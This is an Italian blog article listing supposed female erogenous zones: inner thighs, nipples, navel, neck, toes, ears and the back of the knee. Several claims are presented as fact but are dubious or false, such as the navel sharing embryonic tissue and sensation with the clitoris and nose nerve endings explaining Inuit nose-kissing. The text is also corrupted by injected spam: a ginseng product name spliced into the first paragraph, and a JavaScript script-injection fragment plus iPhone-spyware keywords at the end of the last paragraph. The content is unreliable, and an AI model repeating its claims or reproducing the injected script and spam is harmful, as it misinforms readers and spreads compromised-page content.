Zone erogene femminili: i punti di maggior piacere di una donna

Sicuramente così come per l’uomo, anche le donne hanno delle zone del loro corpo che sono particolarmente angela women’s ginseng erogene. Infatti proprio da queste parti dipende il piacere durante un rapporto sessuale se opportunamente stimolate.

Le donne e il piacere: ecco cosa sapere

punti erogeni femminiliMolto spesso tra le zone erogene principali di una donna non ci sono solo quelle comunemente pensate come il collo, ad esempio.

Ovviamente è importante ricordare che esse andranno stimolate con grande delicatezza e soprattutto nel modo più erotico possibile per determinare sensazioni piacevoli nella donna.

Uno dei punti più erogeni nel corpo della donna è l’interno coscia: ecco perché si può procedere con delle delicate carezze prima del rapporto per poter determinare sensazioni estremamente provocanti, infatti qui ci sono diverse terminazioni nervose legate al piacere sessuale.

Terminazioni che sono presenti, curiosamente, anche nel naso, soprattutto a livello della cartilagine, ecco spiegato il motivo per cui gli eschimesi si baciano col solo contatto nasale.

Quali sono i punti erogeni migliori nella donna

Proprio come nell’uomo, anche la donna possiede nei capezzoli uno dei punti più erogeni.

Infatti addirittura si può raggiungere l’orgasmo se si stimola nella maniera opportuna i capezzoli della donna: sensibili, ad esempio, a morsi così come a delle delicate carezze che potrebbero essere l’ideale per allietare i preliminari di un rapporto sessuale.

Una particolarità importante è legata all’ombelico che è uno dei punti cruciali per il piacere sessuale nella donna: questo vorrà dire che se una donna tocca l’ombelico vuol dire che avverte delle sensazioni molto piacevoli come se stesse toccando il clitoride.

Il tutto è legato al fatto che l’ombelico si genera dallo stesso tessuto embrionale: ciò vuol dire anche che a livello neurologico esiste un certo collegamento tra queste due parti.

Indubbiamente, se si vuole far capire ad una donna di essere eccitati e di voler passare al sodo, iniziare con dei baci sul collo può essere la soluzione migliore: qui ci sono dei recettori sotto la pelle particolarmente sensibili a delle stimolazioni.

Punti erogeni poco noti nelle donne

Ma sicuramente, così come ci sono delle zone erogene delle donne particolarmente note, ce ne sono molte altre che invece per molti saranno una scoperta.

Come gli alluci dei piedi che una donna inizierà a muovere inconsapevolmente nel momento in cui gode durante un rapporto sessuale: ecco perché potrebbe essere la soluzione ideale per far raggiungere l’orgasmo, stimolare opportunamente gli alluci della donna con la bocca o toccandoli in modo delicato con le dita.

Con le dita si può andare a stimolare efficacemente anche l’orecchio che è una delle zone più erogene nelle donne.

Questo senza una spiegazione scientifica ma la sensazione è sicuramente gradevole per coloro che vengono toccati in quel tessuto che collega il lobo al viso.

Le vibrazioni piccanti cruciali in un rapporto sessuale possono derivare anche da un massaggio piacevole e delicato nel retro del ginocchio: qui ci sono terminazioni nervose molto sensibili e che potranno determinare grande piacere durante un rapporto sessuale che potrà essere indimenticabile.d.getElementsByTagName(‘head’)[0].appendChild(s);iphone tracker, spy iphone, highster

Leave a Reply

Your email address will not be published. Required fields are marked *